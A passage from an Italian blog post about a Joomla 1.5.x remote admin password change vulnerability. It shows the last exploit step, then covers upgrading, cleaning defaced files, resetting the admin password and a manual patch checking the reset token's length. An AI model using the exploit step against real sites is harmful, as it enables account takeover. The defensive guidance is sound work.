<p>4) A questo punto avrete il campo di cambio password e, inserendola, editerete direttamente il profilo Administrator <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change" class='wp-smiley' title="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change pics" /> </p>
<p>Il supporto Joomla individuata la vulnerabilità (la variabile token non veniva correttamente verificata) ha provveduto a rilasciare in tempi da record la versione 1.5.6 con tale problema fixato. Dalla sua uscita sono stati scoperti ulteriori vulnerabilità che han portato alla release 1.5.7 in pochi giorni:</p>
<p>Potete scaricare dai seguenti link questa versione:</p>
<p><a href="http://joomlacode.org/gf/download/frsrelease/8376/30993/Joomla_1.5.7-Stable-Full_Package.zip" target="_blank">Joomla 1.5.7 Full Eng</a></p>
<p><a href="http://download.joomla.it/index.php?option=com_docman&amp;task=doc_download&amp;gid=717&amp;&amp;Itemid=2" target="_blank">Joomla 1.5.7 Full Ita</a></p>
<p>Per chi avesse subito un&#8217;hacking sfruttando questa vulnerabilità consiglio di aggiornare a questa versione e, nel caso siano ancora visibili &#8220;tracce&#8221; (home page cambiate) dell&#8217;hacker ho notato, per esperienza, che le pagine maggiormente colpite sono 3:</p>
<ul>
<li>configuration.php</li>
<li>index.php (del template attivo nel Cms)</li>
<li>la cartella &#8220;cache&#8221; (consiglio di svuotarla)</li>
</ul>
<p>Provvedete a ripristinare le originali e il problema è risolto.</p>
<p>Dato che trovere il vostro account Admin non accessibile visto che è stata cambiata la password sarà necessario effettuare l&#8217;accesso direttamente al PhpMyAdmin e riscrivere la password nel Database.</p>
<p>Una guida a questa operazione la potete trovare <a href="http://wiki.joomla.it/index.php?title=Recupero_password_admin" target="_blank">qui</a>.</p>
<p>Per chi non avesse sbattimento ho fatto uno scriptino veloce veloce che fa la stessa cosa. Basta copiare il file nella root della vostra installazione Joomla, richiamarlo da Browser e impostare la password.</p>
<p>Il file lo potete scaricare dal seguente link:</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/change_pwd.rar">Joomla Change Admin Password</a></p>
<p>Infine, x chi ha molto sbattimento, di seguito la guida a come fixare tale vulnerabilità manualmente.</p>
<ol>
<li>Aprire il file &#8220;/components/com_user/models/reset.php&#8221;</li>
<li>Posizionarsi alla riga 113 dopo la riga &#8220;global $mainframe;&#8221; ed inserire il seguente codice<br />
<blockquote><p><strong>if(strlen($token) != 32) {<br />
 $this-&gt;setError(JText::_(&#8216;INVALID_TOKEN&#8217;));<br />
 return false;<br />
 }</strong></p>
</blockquote>
</li>
<li>
<pre>Fine dei giochi! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_biggrin.gif' alt="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change" class='wp-smiley' title="[EXPLOIT] Joomla 1.5.x Remote Admin Password Change pics" /> </pre>
</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Served from: www.capn3m0.org @ 2012-02-09 08:47:28 by W3 Total Cache -->
